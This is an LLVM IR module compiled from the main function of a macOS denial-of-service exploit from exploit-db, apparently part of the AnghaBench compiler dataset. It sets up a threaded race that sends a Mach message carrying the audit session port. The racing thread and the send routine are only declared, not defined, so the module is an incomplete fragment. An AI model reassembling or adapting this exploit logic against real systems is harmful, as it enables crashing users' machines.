; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39373.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39373.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_4__ = type { i32, %struct.TYPE_3__ }
%struct.TYPE_3__ = type { i32, i32, i32, i64, i64 }

@MACH_PORT_NULL = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [30 x i8] c"can't get audit session port\0A\00", align 1
@go = common dso_local global i64 0, align 8
@msg = common dso_local global %struct.TYPE_4__ zeroinitializer, align 8
@MACH_MSG_TYPE_COPY_SEND = common dso_local global i32 0, align 4
@start = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %9 = call i64 (...) @audit_session_self()
  store i64 %9, i64* %6, align 8
  %10 = load i64, i64* %6, align 8
  %11 = load i64, i64* @MACH_PORT_NULL, align 8
  %12 = icmp eq i64 %10, %11
  br i1 %12, label %13, label %15

13:                                               ; preds = %2
  %14 = call i32 @printf(i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str, i64 0, i64 0))
  store i32 0, i32* %3, align 4
  br label %29

15:                                               ; preds = %2
  store i32 0, i32* %8, align 4
  %16 = load i64, i64* @go, align 8
  %17 = inttoptr i64 %16 to i8*
  %18 = bitcast i32* %8 to i8*
  %19 = call i32 @pthread_create(i32* %7, i32* null, i8* %17, i8* %18)
  store i32 4, i32* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 1, i32 0), align 8
  %20 = load i64, i64* %6, align 8
  store i64 %20, i64* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 1, i32 4), align 8
  %21 = load i64, i64* %6, align 8
  store i64 %21, i64* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 1, i32 3), align 8
  %22 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %23 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %24 = call i32 @MACH_MSGH_BITS(i32 %22, i32 %23)
  store i32 %24, i32* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 1, i32 2), align 8
  store i32 70, i32* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 1, i32 1), align 4
  store i32 1000, i32* getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @msg, i32 0, i32 0), align 8
  %25 = call i32 @usleep(i32 100000)
  store i32 1, i32* @start, align 4
  %26 = call i32 (...) @send_message()
  %27 = load i32, i32* %7, align 4
  %28 = call i32 @pthread_join(i32 %27, i32* null)
  store i32 0, i32* %3, align 4
  br label %29

29:                                               ; preds = %15, %13
  %30 = load i32, i32* %3, align 4
  ret i32 %30
}

declare dso_local i64 @audit_session_self(...) #1

declare dso_local i32 @printf(i8*) #1

declare !callback !2 dso_local i32 @pthread_create(i32*, i32*, i8*, i8*) #1

declare dso_local i32 @MACH_MSGH_BITS(i32, i32) #1

declare dso_local i32 @usleep(i32) #1

declare dso_local i32 @send_message(...) #1

declare dso_local i32 @pthread_join(i32, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{!3}
!3 = !{i64 2, i64 3, i1 false}
